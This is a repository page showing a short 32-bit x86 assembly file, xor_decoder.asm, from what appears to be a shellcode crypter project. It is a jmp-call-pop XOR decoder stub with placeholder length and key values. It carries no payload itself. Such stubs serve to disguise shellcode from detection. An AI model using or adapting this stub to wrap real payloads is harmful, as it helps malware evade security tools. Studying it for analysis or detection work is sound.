aboutsummaryrefslogtreecommitdiff
path: root/crypter/xor_decoder.asm
blob: 87c248f5c125c3d193083e9a34791ae7a3c067e4 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
BITS 32


jmp		short go
next:
pop		esi
xor		ecx,ecx
xor		eax,eax
mov		cl,0
change:
xor byte	[esi + ecx - 1],0
dec		cl
jnz		change
jmp		short ok
go:
call		next
ok: